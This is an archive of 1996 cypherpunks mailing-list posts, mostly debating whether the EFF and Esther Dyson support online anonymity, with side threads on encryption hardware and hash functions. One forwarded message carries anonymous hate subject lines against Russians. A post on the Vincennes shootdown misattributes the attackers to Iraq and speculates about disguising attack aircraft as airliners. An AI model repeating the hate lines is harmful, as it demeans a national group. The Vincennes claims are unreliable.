May wrote: >However, as I said, if the top spokesman at EFF gives indication of having >views pretty much 180 degrees out of phase with our views, it's likely >we'll speak up and oppose her (or him), and perhaps even suggest that other >EFF board members look into the matter. "Free speech" is not even an issue. Everyone please take a deep breath. Slow down. Reread Esther's comments. Count to 10. Notice that nowhere does she call for state action to outlaw anonymity. She explicitly predicted a place for anonymity in her CFP'95 talk (is it on the Net anywhere?). We may disagree with her predictions of the future scope of anonymity or with her concerns about the risks of the practice but she has never called for State action. She is discussing the problems she perceives with it. That's all. Poor Esther, Forbes swatted her last week for her prediction that the Net kills copyright and now some of us are swatting her for her prediction that many of the future Net transactions will be non-anonymous. She may be wrong in this prediction but so what. Remember she is from the soft left. She is not a macho-flash radical libertarian like many of us. Save the 155 MM howitzers for the armed opposition not for our allies. DCF From mech at eff.org Tue Sep 3 17:19:44 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 4 Sep 1996 08:19:44 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: <199609031904.MAA23619@eff.org> [again, since I'm not on the CP list these days, feel free to bounce this over to the list if it doesn't make it. I'm not sure what the non-subscriber posting policy is and/or whether such attempted posts are filtered out, though I seem to recall they didn't used to be.] Black Unicorn typed: > > On Mon, 2 Sep 1996, Vladimir Z. Nuri wrote: > > > > > ah, the quasi-yearly ranting on EFF has started up. what a great > > opportunity for drop-down-drag-dead flamewar. 
> > > > Black Unicorn: I resent your holier-than-thou moral posturing > > over EFF, and am going to attack it as representative of other > > criticism I have seen of EFF. > > I, unlike EFF, have never compromised my efforts to make strong crypto, > unescrowed strong crypto, and digital communications, free from the FUD > spouted by government and media alike. I, unlike EFF, have never > compromised my efforts to resist the expansion of a wiretap state. I, > unlike EFF, have never purported to be a political representative for these > positions and folded under the weakest of pressures like a reed. EFF has done none of that either. Compromise: 1. a settlement in which each side gives up some demands or makes concessions. 2. a) an adjustment of opposing principles, systems, etc., by modifying some aspects of each b) the result of such an adjustment. 3. something midway between two other things 4. a) exposure, as of one's reputation, to danger, suspicion, or disrepute b) a weakening, as of one's principles, ideals, etc., as for reasons of expediency. 1 did not occur. EFF yielded nothing on any of the issues you mention. On Digital Telephony, which you clearly allude to, EFF opposed implementation of the wiretapping provisions of the CALEA bill from start to finish, and was instrumental in stripping most of them out, replacing them with new privacy protections. 2 did not occur. Our mission remains unedited from the day it was adopted, and EFF is just as committed to those principles now as ever. We don't have a system, in the relevant sense, as such. There was no such adjustment, ergo no result of one. 3 does not apply in any relevant sense (our steadfast assault against the CDA is a "compromise" under such a definition because it was neither a total victory, nor a total loss - yet I'm certain this is not the definition of "compromise" that you intend). 4a is not relevant (that's the security/secrecy-related definition, a nonsequitur in this context).
4b is simply a restatement of 2a - simply didn't happen. Our results speak for themselves on this. > > EFF is an organization that is professional and has > > worked toward improving cyberspace. it is easy for someone > > such as yourself to criticize such an organization anonymously, > > but what is the justification of your criticism? to me someone > > who has tried and failed, yet is still trying, is better than > > someone who has never tried. > > I would put forth that you know nothing of my efforts, and therefore are > in no position to judge me. I would also put forth that the efforts of > EFF, or lack thereof, are quite public. I would put forth that the public factors of EFF's efforts are quite public, but that you know nothing of the internal factors of those efforts, and ergo lack sufficient knowledge to make the allegations you make. > > what *constructive* > > alternative to EFF do you propose? if you have none, please shut up. > > I think any organization that would apply political pressure rather than > bow to it would be an alternative. I think an organization in touch I'm at a loss to think of any time in which EFF did otherwise. I don't think you have any concept whatsoever what a fight EFF put up over Digital Telephony. I would strongly advise a reading of the original version of the DT/CALEA bill, and the version that passed after EFF took an axe to it. You'll find a world of difference. You're welcome. We make no bones about the fact that the DT bill passing at all with wiretap provisions in it was a defeat. Defeats happen. Being defeated is not the same thing as bowing, as yielding the fight. > enough with its own policy to prevent its staff and board from making > embarrassing big brother type proposals to curtail the ability of any of us > to post without attribution would be an alternative. I think an In other words you propose an alternate EFF that censors its own boardmembers.
I'm not aware of any logical consistency that could adhere to an organization that simultaneously says it supports free speech, yet demands that its board of directors never speak except in agreement with the organization's policy. You are asking for a mini-dictatorship. EFF has no position on anonymity. We also have no position on abortion or on whether roast duck is better than fried chicken. You are in essence demanding that EFF impeach any boardmember that offers an opinion in public or in private about whether or not chicken is good stuff, or states a belief about right to choose v. right to life positions. I'm sorry that we are not totalitarian enough for you. Incidentally, Dyson made no such proposal as you refer to, but simply expressed questions and doubts about the misuse of anonymity, and made a clear and correct statement of fact ("you need to be able to get at somebody's identity to enforce accountability") without offering any value judgement about whether that was a good idea. She concluded that "the question is how do you also enforce freedom of speech and freedom from prosecution for unpopular opinions," clearly indicating at least as much doubt about the value of any attempt to force identifiability and accountability. Even Dyson's lead statement that "the damage that can be done by anonymity is far bigger" online than offline is factually correct, and does not consist of any kind of value judgement. It's simply an honest and, IMNERHO, necessary observation. If we lie to the public, or lie to ourselves, we lose, because the opposition will have arguments we have not even looked at much less wrestled with. I'm sorry we are not self-delusional and dishonest enough for you. > organization without the internal conflict and strife that has clearly > marred EFF in past and made it a laughable attempt at cohesive political > persuasion would be an alternative. I have news for you: We are human.
Incidentally, two points: 1) "cohesive political persuasion" is not the be-all and end-all of civil liberties work, just a part of it; and 2) the political cohesion you want to see is very hard to accomplish, because civil libertarians are loath to march in lockstep. Compare the Christian Coalition and their allies - authoritarians all. It is no surprise, on a moment's consideration, that their spot on the politics-of-rights-and-authority axis has everything to do with their ability to suspend disbelief, to embrace blind faith, and to act in unison. BUT - a lot of progress is being made. EFF, ACLU, CDT, VTW, EPIC, et al., are all coordinating like never before, new global-scale civil liberties coalitions are forming, joint legal cases being filed, joint press releases and action alerts being issued, conferences organized together, etc. What you are looking for is evolving as we type. > I think an organization that had > official policies on the core issues which it proposes to influence would > be an alternative. EFF has that. We have not proposed to influence anonymity issues, and we do not have a policy on that issue. When we have a policy on it, we'll probably propose to influence it. > In short, an organization that had even one of the needed elements of > legislative influence. (Cohesive, directed, persistent, and > uncompromising). We have all of these elements, but we have a lot more to do than engage in legislative influence. You've all seen how well that worked. The process is very corrupt, so we have to use it sparingly, and only when necessary. The bulk of our work has to be done in other areas like supporting technical development, fighting cases to the Supreme Court, direct grassroots action campaigns, public education, media exposure, etc. All of these things directly affect the Hill, but EFF is not solely a lobbying organization. Even CDT and other DC-based groups are not solely lobbying organizations.
> > I am tired of people announcing loudly to the world, "well if EFF > > doesn't support [insert my personal jihad here], then they're > > a bunch of losers who don't deserve anyone's money". > > Now who's holier-than-thou? What is so shocking about announcing that a > given organization does not support my interests and therefore calling on > others who share my interests not to make financial donations to said > organization? What's shocking to me is that you'd state as fact "that a given organization does not support [your] interests" when you have no actual knowledge of whether that's true or not, just a vague perception based on clearly insufficient information, and misapprehensions of fact that are easily refutable. > Is there something EFF fears in free speech and political > consensus building? Perhaps if they had a straightforward policy.... Certainly not. And please note that the person you are responding to does not speak for EFF, so your question is a nonsequitur. [Some stuff skipped, since irrelevant.] > > get a clue. an organization does not have to officially espouse what > > its members espouse. > > No, but when an organization espouses nothing on a given subject key to > its mission, what does that say? What about when its members espouse That says that the board of that organization has yet to come to consensus on the issue. Happens all the time. Ask the ACLU - there are all kinds of issues that someone somewhere thinks is "key to its mission" that ACLU has not yet evolved a position on, and won't until they need to due to some event or impending event such as legislation or a court case. Personally I agree with you that this issue is key to our mission, and I hope that EFF has a position on it soon. But I'm not the chairman of the board, so I wait, and I speak my mind. I have no problem with you speaking your mind, or even being less willing to wait. But I have no respect for unfounded accusations and fingerpointing. 
I don't even have much respect for well-founded fingerpointing when it's not helpful. Cypherpunks are supposed to write code. This is a waste of time. > entirely different and even counter productive beliefs? I would hardly > trust Senator Burns on the board of the ACLU, or a George Pacific > exec on Sierra Club's board. What's different here? Neither are on our board. What's your point? > > what an organization espouses should be carefully > > crafted. if all members feel strongly about an issue, yet all also > > feel that it should not be part of the official plank, then that may be > > a wise decision to leave it out. what an organization does *not* do is as > > important as what it does do. EFF is learning, by trial and error and the > > hard way, to "choose battles wisely". > > I thought its point was to protect cyberspace? What battles are left > after Digital Telecom, Anonymous Communication, Strong Crypto and CDA? About a thousand. Probably more. > There aren't many battles to choose. What a laugh. Just an example: At least 12 US states have passed or are considering passing CDA-like state legislation. Even after we kick the CDA's unconstitutional butt, each one of those state bills, with one or two exceptions if we're lucky, will have to be individually dealt with all the way to the state supreme courts in all probability, and quite possibly to the US Supreme Court in some cases. None of these bills are direct clones of the CDA, and it's doubtful that a whole lot of the CDA ruling will apply to them, necessitating individual constitutionality challenges. Now think on how many other jurisdictions there are in the world, from the local to the multinational, and consider how many of them have or are in the process of getting their own CDA-alike. And this is before we even think about censorship of online "hate speech" or "dangerous information". This is just the anti-porn bills.
AND, when all is said and done the majority of these jurisdictions, especially the US federal Congress, are very likely to come right back and try it all again, with slightly modified bills that attempt to get around previous rulings. This is complete aside from privacy issues which are even less clear-cut than free speech issues. If you think there are a handful of issues to wrestle with, you are very, very sadly mistaken. There's an ocean of them. > Let's seem some action. I must surmise you don't read much about us. > I can sit > on my hands all day long too, but I will hardly claim to be supporting > hunger prevention in Africa by "thinking very hard about the subject." > (Particularly not when I have accepted money to further that goal). http://www.eff.org/pub/Legal/Cases/SJG http://www.eff.org/pub/Legal/Cases/Phrack_Neidorf_Riggs http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ http://www.eff.org/pub/Legal/Cases/AABBS_Thomases_Memphis/ http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS http://www.eff.org/pub/Legal/Cases/Church_of_Scientology_cases http://www.eff.org/pub/Legal/Cases/Clipper_FOIA http://www.eff.org/pub/Legal/Cases/PGP_Zimmermann http://www.eff.org/pub/Legal/Cases/Gilmore_v_NSA http://www.eff.org/pub/Legal/Cases/Karn_Schneier_export http://www.eff.org/pub/Legal/Cases/Kerberos_export http://www.eff.org/pub/Censorship/Internet_censorship_bills http://www.eff.org/pub/Censorship/Rimm_CMU_Time http://www.eff.org/pub/Censorship/GII_NII http://www.eff.org/pub/Censorship/Hate-speech_discrimination http://www.eff.org/pub/Censorship/Online_services http://www.eff.org/pub/Censorship/Terrorism_militias http://www.eff.org/pub/Privacy http://www.eff.org/pub/Privacy/ITAR_export http://www.eff.org/pub/Privacy/Key_escrow http://www.eff.org/pub/Privacy/Crypto_bills_1996 http://www.eff.org/pub/Privacy/Digital_Telephony_FBI http://www.eff.org/pub/Privacy/Email_GII_NII http://www.eff.org/pub/Privacy/Terrorism_militias http://www.eff.org/pub/Privacy/Tools 
http://www.eff.org/pub/Activism/FOIA/ITAR_FOIA http://www.eff.org/pub/GII_NII http://www.eff.org/pub/GII_NII/Govt_docs http://www.eff.org/pub/GII_NII/ISDN http://www.eff.org/pub/GII_NII/NREN_NSFNET_NPN http://www.eff.org/pub/Net_info/EFF_Net_Guide http://www.eff.org/pub/Alerts/ http://www.eff.org/pub/Intellectual_property/NII_copyright_bill [EFF has a position on intprop in as much as the fair use rights of the public are involved, and we work with DFC on this issue.] http://www.eff.org/blueribbon.html http://www.eff.org/goldkey.html http://www.ipc.org/ipc http://www.crypto.com http://www.etrust.org and so forth and so on. That's just off the top of my head. [Note: If one of these URLs doesn't work for you, stick "/index.html" at the end of it and try again, and/or try www2.eff.org instead of www.eff.org.] > > I would love to see more info about EFF's new direction. but one > > can ask for such clarification without a rabid style such as your own. > > Are you one of those people who still believes you can get more flies with > honey...? Ever been to Washington, D.C.? What does DC have to do with clarification of EFF's "new direction"? EFF was not founded in DC, and is not based there now. CDT fissioned off to do the DC stuff. > > blah, blah, blah. why should EFF give the slightest damn what you think > > of them? > > Its fairly clear that they don't. That said, why should I not make that You are mistaken. Don't think for an instant I'd waste 5 seconds of staff time on you otherwise. I have 10x more to do than I have time to do it in. [rest deleted as irrelevant, since founded on mistaken assumption.] > > why do I see so much of this in cyberspace and on the cpunks list: > > gripes, gripes, gripes by people who have no record themselves of > > doing anything constructive...? the difficulty of doing something > > constructive is proven by the failures, it is not necessarily > > evidence of incompetence or conspiracies. 
perhaps you, Unicorn, > > feel the cpunks have a greater track record than EFF? > > I do in fact feel the cpunks have a greater track record than EFF. Tell > me, what has EFF done? See URLs above. Consider it a suggested reading list. > The list of "cypherpunk" accomplishments in terms > of making the net a better place to be is, in my view, significant. Indeed it is. I do not think it possible to quantify what EFF have done or what CPs have done, and then weigh the two against each other. I have yet to see an accomplishometer. I also can't think of any point in doing so. This is not a contest. We are on the same side. > Certainly the discussion here is livelier than anything I've seen from > EFF. EFF is not a discussion forum (though we provide, in some sense, a pretty lively one at comp.org.eff.talk in Usenet. We also started alt.politics.datahighway, which sees some traffic, mostly about US govt "info superhighway" hype and b.s. Comp.org.eff.talk is more general, and tends to focus on civil liberties issues and cases.) > > >I would be most happy to be proven wrong and see EFF suddenly, in a burst > > >of impressive moral fiber, speak out publicly and take some political > > >action to assure anonymous communication. > > > > I would like you to explain why you feel the need to criticize EFF > > for not necessarily sharing your own agenda. > > The same reason I feel free to criticize communism for not sharing my own > agenda. > > You reveal here the basic character of your objection. You don't like > the fact that I criticized EFF. It has nothing to do with the fact that > you think EFF has done wonderful and fantastic things (you point to none > in this post) but that you have some emotional fondness for them. This is > the trap. EFF _sounds_ good, and so it's worth sticking up for. Well > what, EFF, have you done for us LATELY? Again, see above.
See in particular: http://www.eff.org/pub/Censorship/Internet_censorship_bills - PA court rules CDA unconstitutional http://www.eff.org/pub/Legal/Cases/Bernstein_v_DoS - CA court rules software - both source and object code - protected expression under the First Amendment Both cases are headed for the Supreme Court. NB: I think your criticism is valid at least in the abstract. It is certainly fair to ask what we've done, not how we sound or feel. I think the references I've provided will answer that question adequately. > > >Well, let's have a clear official position issued then to end all dispute. > > > > again, you fail to grasp: EFF may justifiably not want to engage in that > > fight. it might be a wise decision. who are you to dictate EFF's > > agenda? why are you picking a fight with someone who might be the > > best ally? > > If EFF is the best ally then we need to seek others. They have done > nothing in my view to help keep strong crypto around, to secure a person's > right to speak without a citizen unit I.D. being attached, and to promote, > by extension, free speech. Then you know absolutely diddley about what we are doing. Beware lecturing about that of which you know little. If our legal cases win, we win all of the above concerns you just articulated. And both cases look very much like they will win hands down. And, these are hardly the only fronts we are working on. > Look, even you have gotten on my case here for > speaking without revealing my real name. You think something I said Notably I have not. Indeed, I mentioned to the board here that the fact that I've met you in person, signed your PGP key, had you and other DC CP's over to EFF's DC office for CP meetings, was a testament to anonymity/pseudonymity - I didn't need to know the name the government calls you by, just needed to see enough evidence that you as a body are attached to Black Unicorn as a nym, and to have an idea of the reputation of the nym.
[non-relevant (to me) comments skipped.] > > > Of > > >course you should expect people to wonder about EFF when you have no > > > official position and yet some staff and board members seem to have a > > >statist bent. > > > > and you, like many other cypherpunks and cyberspace weasels, > > have a whine-and-shriek-from-the-shadows bent. > > And your point is? > > You'd like the shadows lifted? Speaking without a true name attached is > somehow evil? I tend to suspect the criticism had more to do with "all talk and no action" and other such concerns. Just my interpretation. > Why not make some solid arguments for why TCM is wrong then? Certainly it > appears he is on the mark to me. The main flaw in this reasoning (which I'm not sure at all is actually Tim's reasoning, but appears to be the reasoning here) is that these efforts are not contradictory, but complementary. As a practical matter, the entire question is meaningless since neither effort can be measured, and there is no point in doing so in the first place, since no issue of whether or not the CPs or the EFF is 'better' has arisen, and no such issue makes sense. > > I also don't understand the anonymity fight by cpunks. it's the > > wrong battle imho. ask any remailer operators how their services > > are panning out. they will complain of the incessant spam and > > increasing litigious pressure. I don't see any technological > > solutions to these problems. if there were, they'd have been > > invented now. > > This is EFF talking. "The situation is hopeless, bail now to preserve > image." Uh, no, that was someone talking, who has an individual opinion on the subject. One that I don't share and that I don't think anyone else shares at EFF either. In particular, the litigatory pressures are likely to be groundless, at least in US law. There is a hell of a lot of caselaw supporting the rights to anonymous and pseudonymous speech and publication. 
As for the spam problem, that can be rather trivially fixed with filters (or reduced, at least. Clever people will always find a way to break or abuse any given system.) EFF has never "bailed" from any issue to preserve image. If we'd been concerned with image, we would not have taken the tactic we did with DigTel - a tactic that worked incompletely but better than shouting "boo" from the sidelines, but a tactic which harmed our image very much. Such is the price we pay. Our mission is not "to look cool to the public", much less to Cypherpunks, our mission is to protect the public interest and individual liberty. > Explain to me how reputation systems work in the absence of anonymity. > Explain to me when freedom has been anything but "a pain in the ass." I have to agree wholeheartedly. > Weakness is all you have to offer. Offer it to EFF. No thanks, we have no use for it. We also have no use for pointless ankle-biting. Please, go write some code. That's what you guys are best at, and it's why you're here ("here" = cypherpunks). If you are in need of a project, how about an anon remailer that runs on Windows 3.x, NT, and 95, and another for Mac? There are what, maybe 20 operational chained remailers right now? That's not going to cut it. There need to be more. (This is MY PERSONAL opinion, not an EFF statement of policy. For the time being anyway. :) PS: No hard feelings are held here, on my part, and I intend to convey none, even if I do argue forcefully. I am not your enemy. Consider this a workout, some mental sparring to get the blood flowing. -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From jonl at well.com Tue Sep 3 17:21:00 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 08:21:00 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.16.19960903152037.58cfc590@mail.well.com> At 12:04 PM 9/3/96 -0700, Stanton McCandlish wrote: >> I, unlike EFF, have never compromised my efforts to make strong crypto, >> unescrowed strong crypto, and digital communications, free from the FUD >> spouted by government and media alike. I, unlike EFF, have never >> compromised my efforts to resist the expansion of a wiretap state. I, >> unlike EFF, have never purported to be a political representative for these >> positions and folded under the weakest of pressures like a reed. > >EFF has done none of that either. > >Compromise: 1. a settlement in which each side gives up some demands or >makes concessions. 2. a) an adjustment of opposing principles, systems, >etc., by modifying some aspects of each b) the result of such an >adjustment. 3. something midway between two other things 4. a) exposure, >as of one's reputation, to danger, suspicion, or disrepute b) a >weakening, as of one's principles, ideals, etc., as for reasons of >expediency. > >1 did not occur. EFF yielded nothing on any of the issues you mention. >On Digital Telephony, which you clearly allude to, EFF opposed >implementation of the wiretapping provisions of the CALEA bill from start >to finish, and was instrumental in stripping most of them out, replacing >them with new privacy protections. 2 did not occur. Our mission remains >unedited from the day it was adopted, and EFF is just as committed to those >principles now as ever. We don't have a system, in the relevant sense, >as such. There was no such adjustment, ergo no result of one.
3 does >not apply in any relevant sense (our steadfast assault against the CDA is >a "compromise" under such a definition because it was neither a total >victory, nor a total loss - yet I'm certain this is not the definition of >"compromise" that you intend). 4a is not relevant (that's the >security/secrecy-related definition, a non sequitur in this context). 4b >is simply a restatement of 2a - simply didn't happen. Our results speak >for themselves on this. Compromise is not necessarily a bad thing; without some give and take, we sorta run right over each other. OTOH, I do agree that a strong position is necessary at this juncture. -- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From talon57 at well.com Tue Sep 3 17:27:39 1996 From: talon57 at well.com (Brian D Williams) Date: Wed, 4 Sep 1996 08:27:39 +0800 Subject: The Vincennes shootdown Message-ID: <199609032039.NAA13681@well.com> FACT #1 The U.S.S. Vincennes was under attack by gunboats of Iraq's Republican guard at the time of the unfortunate incident. (All bets are off) FACT #2 Intelligence believed the Republican guard had its own version of the "Kamikaze." Fact #3 If I was still a sneaky-ass airwarrior given the mission to take out a vastly superior vehicle like an Aegis class cruiser I would do one of the following: a) set my transponder to the I.D. of a commercial jet, and do my best to fly like its profile. b) turn my transponder off and "ride tail" (stay directly under and behind the commercial jet, hiding in its radar sig) till I was within range. 
Brian From dlv at bwalk.dm.com Tue Sep 3 17:36:06 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 4 Sep 1996 08:36:06 +0800 Subject: Forwarded Mail In-Reply-To: <199609031658.SAA01776@basement.replay.com> Message-ID: >From nobody at REPLAY.COM Tue Sep 3 12:58:21 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Tue, 03 Sep 96 13:17:51 EDT for dlv Received: from [194.109.9.44] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA23053 for dlv at bwalk.dm.com; Tue, 3 Sep 96 12:58:21 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA01776 for dlv at bwalk.dm.com; Tue, 3 Sep 1996 18:58:19 +0200 (MET DST) Date: Tue, 3 Sep 1996 18:58:19 +0200 (MET DST) Message-Id: <199609031658.SAA01776 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: KILL ALL RUSSIAN IMIGRANTS Return-Path: To: cypherpunks at toad.com Subject: Kill all "libertarians" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 02 Sep 96 15:48:31 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. 
Sender: owner-cypherpunks at toad.com >From nobody at REPLAY.COM Mon Sep 2 12:26:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Mon, 02 Sep 96 15:42:57 EDT for dlv Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18013 for dlv at bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400 Received: (from replay at localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv at bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST) Message-Id: <199609021626.SAA11752 at basement.replay.com> To: dlv at bwalk.dm.com From: nobody at REPLAY.COM (Anonymous) Organization: Replay and Company UnLimited Xcomm: Replay may or may not approve of the content of this posting Xcomm: Report misuse of this automated service to Subject: All russians are scum. No exceptions. Return-Path: To: cypherpunks at toad.com Subject: Re: Sen. Leahy's "impeccable cyberspace credentials" From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Comments: Dole/Kemp '96! Date: Mon, 02 Sep 96 01:19:37 EDT Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. Sender: owner-cypherpunks at toad.com jonathon writes: > On Sun, 1 Sep 1996, James A. Donald wrote: > > > > I agree with what you are saying but not all polititions are that bad. > > > You make it sound as if their are no politisions are for freedom of the > > > net. > > So who is the exception? > > Harry Browne Libertarian Party Candidate. Harry Browne is a fucking statist. All politicians are scum. No exceptions. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From adam at homeport.org Tue Sep 3 18:10:01 1996 From: adam at homeport.org (Adam Shostack) Date: Wed, 4 Sep 1996 09:10:01 +0800 Subject: [Noise] Hardware encryption devices? Message-ID: <199609032223.RAA03063@homeport.org> Anyone used any LAN encryption devices (ethernet or fast ethernet speed?) 
Something that could do IP AH off the back of an Ultrasparc would be ideal. Proprietary packet formats are ok, if they tunnel in IP. Needs to use DES, IDEA, or some other well known cipher. Manual key exchange is ok for this app. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at got.net Tue Sep 3 18:14:49 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 09:14:49 +0800 Subject: The Esther Dyson Flap Message-ID: At 8:40 PM 9/3/96, Duncan Frissell wrote: >Everyone please take a deep breath. Slow down. Reread Esther's comments. >Count to 10. Notice that nowhere does she call for state action to outlaw >anonymity. She explicitly predicted a place for anonymity in her CFP'95 >talk (is it on the Net anywhere?). We may disagree with her predictions of >the future scope of anonymity or with her concerns about the risks of the >practice but she has never called for State action. She is discussing the >problems she perceives with it. That's all. I certainly read her words, and don't need to be told to reread them just because I take them to mean she supports anonymity less than many of us would like. As I said in my message to Chuck Thompson, I held off in criticizing her "L.A. Times" words until I could get a better clarification of what she said, precisely, what was taken out of context, and what she really meant to say. When she spoke up and the result was just as ambivalent about anonymity rights, this is when I wrote my first criticism of her views. And I saw her CFP '95 talk. I've also read various of her other comments on the Net, freedom, responsibility, and anonymity. Some of her comments: * "Esther Dyson, President EDventure Holdings, Inc. said her work with the Electronic Frontier Foundation was based on the assumptions that the Internet will have a beneficial effect on society. "The longer I have been at this, the more questions I have about these assumptions," she said." 
(Perhaps Esther is finding the goals of the EFF--or at least the views of the other board members--are not her goals.) * "The second way to create friction is to create accountability, identity and personality. "I would like to see a world where anonymity is not illegal, but is discouraged," Dyson said. "It has its place in life, but people should have persistent identities."" (Couple with other comments about possibly requiring traceability (albeit with some legal protections), it sure does sound like her form of "discouraged" would imply a role for government.) * "This raises the issue of privacy. "I am looking at a notion of privacy for the consumer, but less privacy for companies and public office holders and others in positions of responsibility," she said." (Is this the direction the EFF is being taken in? Granted, these are her comments, but surely the views of the Chairman of the EFF affect the personality and direction of the organization.) These quotes from: http://seicenter.wharton.upenn.edu/SEIcenter/panel3.html. By the way, the Scientologists have also noted her views: "Esther Dyson, member of the board of directors of the Electronic Frontier Foundation and member of the National Information Infrastructure Advisory Council, spoke on the anonymity issue at the fifth Computers, Freedom & Privacy (CFP) conference in San Francisco. "I have a concern about the spread of bad behavior on the Net," said Dyson. "Anonymity figures into this, and I feel that it has proven to not be a positive factor. It breaks down the community which we are seeking to build, and could turn the 'big cities' of the information infrastructure into a big cesspool." "Remailers who facilitate anonymous postings are part of the problem. They can act as conduits for those who seek anonymity as a way to act illegally without getting caught; yet remailers are able to shield themselves from responsibility or liability. 
"Computer experts stress that anonymous users should at least be trackable by the remailers -- and that ones who act unlawfully can easily put the remailers at risk. Dyson noted that in self-regulatory schemes for almost any part of the Internet, "visibility, not anonymity, would have a strong place."" (end quote, from "Freedom," at http://www.theta.com/goodman/hijack.htm) >Remember she is from the soft left. She is not a macho-flash radical >libertarian like many of us. Save the 155 MM howitzers for the armed >opposition not for our allies. I don't know what "macho-flash" means, but I reject the label. And please spare us the "save the howitzers" comment. We talk about what concerns us. As it happens, our political opponents don't read our words, whereas a bunch of EFF board members apparently do, and so our criticisms here may cause EFF to actually confront the issue of anonymity and decide where they actually stand. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jamesd at echeque.com Tue Sep 3 18:24:24 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 09:24:24 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609032113.OAA06380@dns2.noc.best.net> At 12:53 PM 9/3/96 -0700, Stanton McCandlish wrote: > EFF in generally does not issue extremist position > statements, but is careful to examine the risks as well as the benefits, > and look for pro-liberty solutions to those risks. 
If the right to speak anonymously is an "extremist" position in the eyes of the EFF, then they are no friends of liberty. It is hardly an "extremist" position outside of such countries as Cuba, Iran, or China. It is the overwhelmingly mainstream position, not just among netizens, but when last heard, amongst supreme court judges and ordinary people in the street. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From myth at nym.alias.net Tue Sep 3 19:04:31 1996 From: myth at nym.alias.net (Medea) Date: Wed, 4 Sep 1996 10:04:31 +0800 Subject: [NOISE] The Doors Message-ID: <199609032152.RAA26814@anon.lcs.mit.edu> Vipul wrote: > >The Doors was not only about freedom and love, but about crypto too! >Notice these lines from the song "Five to One" > >Old [cipher] gets old and young get stronger >May take a week baby, may take longer [to crack] >they've [clinton] got the guns and we've got the numbers >gonna win we will take 'em over, com'on. What?! I think you need to stop ingesting those controlled substances.... Medea ======================================== I wonder whatever happened to Jason.... From markm at voicenet.com Tue Sep 3 19:26:15 1996 From: markm at voicenet.com (Mark M.) Date: Wed, 4 Sep 1996 10:26:15 +0800 Subject: Message Digest In-Reply-To: <01BB9989.81517870@dial15.pcnet.ro> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 3 Sep 1996, Costin RAIU wrote: > I'm interested in a 256 bits (or more) message digest algorithm > (C source is better). Any URLs ? Try HAVAL. It is a variable one-way hash function that is apparently secure against collisions. It should be on any of the standard crypto FTP sites. - -- Mark PGP encrypted mail prefered. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From jquinby at fivepaces.com Tue Sep 3 19:34:26 1996 From: jquinby at fivepaces.com (Jay Quinby) Date: Wed, 4 Sep 1996 10:34:26 +0800 Subject: [NOISE] The Doors Message-ID: <2.2.32.19960903214956.007154d4@mailhost> At 07:36 PM 9/3/96 +0000, you wrote: > >The Doors was not only about freedom and love, but about crypto too! >Notice these lines from the song "Five to One" > >Old [cipher] gets old and young get stronger >May take a week baby, may take longer [to crack] Actually, I think the line reads "They take our week, and make it longer." (There's a line a little later that goes "Trading your hours for a handful of dimes.") >they've [clinton] got the guns and we've got the numbers >gonna win we will take 'em over, com'on. Slightly left of topic, but it is a great song! :) Someone ought to compile a "Best of Crypto-references in pop culture" file. |--------------------------------------------------------------------------| |James R. Quinby, Atlanta, GA | PADI/153KHz-999MHz/HTML/EADBGE/Phl4:8-13 | |jquinby at fivepaces.com (work) | Own a 45 MPH couch potato: Adopt a | |jquinby at bellsouth.net (home) | greyhound today. Write for details. | |--------------------------------------------------------------------------| |Standard disclaimer: Opinions expressed are mine alone, not my employers. 
